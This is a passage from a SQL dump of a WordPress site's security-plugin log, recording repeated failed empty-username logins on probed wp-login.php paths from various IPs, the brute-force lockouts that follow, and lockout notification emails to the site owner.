11:46:26',17799120,19290112,'https://bintara.com.my/blog/wp-login.php',1,0,'159.65.155.117'),(25755,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:46:26\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:46:26\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:01:26\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:01:26\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:46:27','2019-09-21 11:46:26',17883992,19290112,'https://bintara.com.my/blog/wp-login.php',1,0,'159.65.155.117'),(25756,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:46:27','2019-09-21 11:46:26',18090960,19290112,'https://bintara.com.my/blog/wp-login.php',1,0,'159.65.155.117'),(25757,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYN6bfBTP0kPOVnb8jq1QAAAFU\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"91.205.172.112\";s:11:\"REMOTE_PORT\";s:5:\"34166\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYN6bfBTP0kPOVnb8jq1QAAAFU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066473.2301\";s:12:\"REQUEST_TIME\";s:10:\"1569066473\";}}','notice','2019-09-21 11:47:54','2019-09-21 11:47:53',17799120,19290112,'https://bintara.com.my/test/wp-login.php',1,0,'91.205.172.112'),(25758,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:47:53\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:47:53\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:02:53\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:02:53\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:47:54','2019-09-21 11:47:53',17883992,19290112,'https://bintara.com.my/test/wp-login.php',1,0,'91.205.172.112'),(25759,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:47:54','2019-09-21 11:47:53',18090960,19290112,'https://bintara.com.my/test/wp-login.php',1,0,'91.205.172.112'),(25760,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOFXkXpgmG5P@iB8kdXwAAAII\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.155.76\";s:11:\"REMOTE_PORT\";s:5:\"54204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOFXkXpgmG5P@iB8kdXwAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066517.5785\";s:12:\"REQUEST_TIME\";s:10:\"1569066517\";}}','notice','2019-09-21 11:48:38','2019-09-21 11:48:37',17797904,19288920,'https://bintara.com.my/wordpress/wp-login.php',1,0,'206.189.155.76'),(25761,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOJ3kXpgmG5P@iB8kdeQAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.73.82\";s:11:\"REMOTE_PORT\";s:5:\"60492\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOJ3kXpgmG5P@iB8kdeQAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066536.0039\";s:12:\"REQUEST_TIME\";s:10:\"1569066536\";}}','notice','2019-09-21 11:48:57','2019-09-21 11:48:56',17793536,19283920,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.73.82'),(25762,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOKXkXpgmG5P@iB8kdfQAAAJQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"40.121.130.23\";s:11:\"REMOTE_PORT\";s:5:\"55912\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOKXkXpgmG5P@iB8kdfQAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066537.4527\";s:12:\"REQUEST_TIME\";s:10:\"1569066537\";}}','notice','2019-09-21 11:48:58','2019-09-21 11:48:57',17797136,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'40.121.130.23'),(25763,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:48:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:48:57\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:03:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:03:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:48:58','2019-09-21 11:48:57',17882184,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'40.121.130.23'),(25764,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:48:58','2019-09-21 11:48:57',18087928,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'40.121.130.23'),(25765,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOP3kXpgmG5P@iB8kdlwAAAJU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.123.107\";s:11:\"REMOTE_PORT\";s:5:\"53032\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOP3kXpgmG5P@iB8kdlwAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066559.2368\";s:12:\"REQUEST_TIME\";s:10:\"1569066559\";}}','notice','2019-09-21 11:49:20','2019-09-21 11:49:19',17798608,19288232,'https://bintara.com.my/wordpress/wp-login.php',1,0,'162.144.123.107'),(25766,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:49:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:49:19\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:04:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:04:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:49:20','2019-09-21 11:49:19',17883480,19288232,'https://bintara.com.my/wordpress/wp-login.php',1,0,'162.144.123.107'),(25767,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:49:20','2019-09-21 11:49:19',18089200,19288232,'https://bintara.com.my/wordpress/wp-login.php',1,0,'162.144.123.107'),(25768,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOUXkXpgmG5P@iB8kdrwAAAJc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"46048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOUXkXpgmG5P@iB8kdrwAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066577.1149\";s:12:\"REQUEST_TIME\";s:10:\"1569066577\";}}','notice','2019-09-21 11:49:38','2019-09-21 11:49:37',17799024,19288872,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.157.66'),(25769,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:49:37\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:49:37\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:04:37\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:04:37\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:49:38','2019-09-21 11:49:37',17883176,19288872,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.157.66'),(25770,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:49:38','2019-09-21 